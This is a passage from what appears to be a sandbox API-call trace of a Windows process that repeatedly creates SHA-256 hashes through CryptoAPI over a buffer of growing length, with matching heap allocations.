	[0193.766] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303cf0
	[0193.766] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303cf0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303cf0, pdwDataLen=0x1283b0) returned 1
	[0193.766] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.766] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.766] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.767] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.767] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0193.767] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.767] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303d18
	[0193.767] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303d18, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303d18, pdwDataLen=0x1283b0) returned 1
	[0193.767] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.767] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.767] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.767] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.767] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0193.767] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.767] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303d40
	[0193.767] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303d40, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303d40, pdwDataLen=0x1283b0) returned 1
	[0193.767] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.767] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.767] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.768] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.768] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0193.768] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.768] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303d68
	[0193.768] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303d68, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303d68, pdwDataLen=0x1283b0) returned 1
	[0193.768] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.768] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.768] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.769] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.769] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0193.769] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.769] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303d90
	[0193.769] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303d90, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303d90, pdwDataLen=0x1283b0) returned 1
	[0193.769] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.769] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.769] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.769] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.769] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0193.769] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.769] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303db8
	[0193.769] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303db8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303db8, pdwDataLen=0x1283b0) returned 1
	[0193.769] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.769] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.769] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.770] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.770] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0193.770] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.770] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303de0
	[0193.770] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303de0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303de0, pdwDataLen=0x1283b0) returned 1
	[0193.770] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.770] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.770] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.770] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.770] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0193.770] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.770] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303e08
	[0193.770] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303e08, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303e08, pdwDataLen=0x1283b0) returned 1
	[0193.770] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.770] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.770] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.771] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.771] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0193.771] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.771] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303e30
	[0193.771] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303e30, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303e30, pdwDataLen=0x1283b0) returned 1
	[0193.771] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.771] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.771] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.771] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.771] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0193.771] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.771] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303e58
	[0193.771] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303e58, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303e58, pdwDataLen=0x1283b0) returned 1
	[0193.771] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.771] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.771] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.772] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.772] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0193.772] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.772] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303e80
	[0193.772] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303e80, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303e80, pdwDataLen=0x1283b0) returned 1
	[0193.772] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.772] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.772] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.772] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.772] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0193.772] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.772] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303ea8
	[0193.772] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303ea8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303ea8, pdwDataLen=0x1283b0) returned 1
	[0193.772] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.772] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.772] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.773] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.773] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0193.773] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.773] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303ed0
	[0193.773] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303ed0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303ed0, pdwDataLen=0x1283b0) returned 1
	[0193.773] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.773] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.773] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.773] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.773] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0193.773] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.773] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303ef8
	[0193.773] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303ef8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303ef8, pdwDataLen=0x1283b0) returned 1
	[0193.773] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.773] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.773] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.774] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.774] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0193.774] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.774] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303f20
	[0193.774] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303f20, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303f20, pdwDataLen=0x1283b0) returned 1
	[0193.774] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.774] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.774] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.774] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.774] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0193.774] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.774] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303f48
	[0193.774] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303f48, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303f48, pdwDataLen=0x1283b0) returned 1
	[0193.774] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.774] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.774] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.775] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.775] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0193.775] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.775] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303f70
	[0193.775] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303f70, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303f70, pdwDataLen=0x1283b0) returned 1
	[0193.775] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.775] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.775] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.775] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.775] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0193.775] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.775] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303f98
	[0193.775] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303f98, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303f98, pdwDataLen=0x1283b0) returned 1
	[0193.775] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.775] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.775] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.776] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.776] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0193.776] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.776] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303fc0
	[0193.776] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303fc0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303fc0, pdwDataLen=0x1283b0) returned 1
	[0193.776] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.776] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.776] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.776] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.776] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0193.776] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.776] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307be0
	[0193.776] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2307be0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2307be0, pdwDataLen=0x1283b0) returned 1
	[0193.776] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.776] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.776] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.777] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.777] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0193.777] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.777] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307d48
	[0193.777] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2307d48, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2307d48, pdwDataLen=0x1283b0) returned 1
	[0193.777] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.777] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.777] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.777] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.777] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0193.777] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.777] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a8e58
	[0193.777] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x22a8e58, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x22a8e58, pdwDataLen=0x1283b0) returned 1
	[0193.777] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.777] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.777] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.778] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.778] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0193.778] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.778] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24c7a8
	[0193.778] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x24c7a8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x24c7a8, pdwDataLen=0x1283b0) returned 1
	[0193.778] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.778] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.778] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.778] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.778] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0193.778] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.778] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306528
	[0193.778] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2306528, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2306528, pdwDataLen=0x1283b0) returned 1
	[0193.778] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.778] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.778] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.779] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.779] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0193.779] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.779] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309000
	[0193.779] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309000, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309000, pdwDataLen=0x1283b0) returned 1
	[0193.779] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.779] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.779] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.779] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.779] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0193.779] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.779] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309028
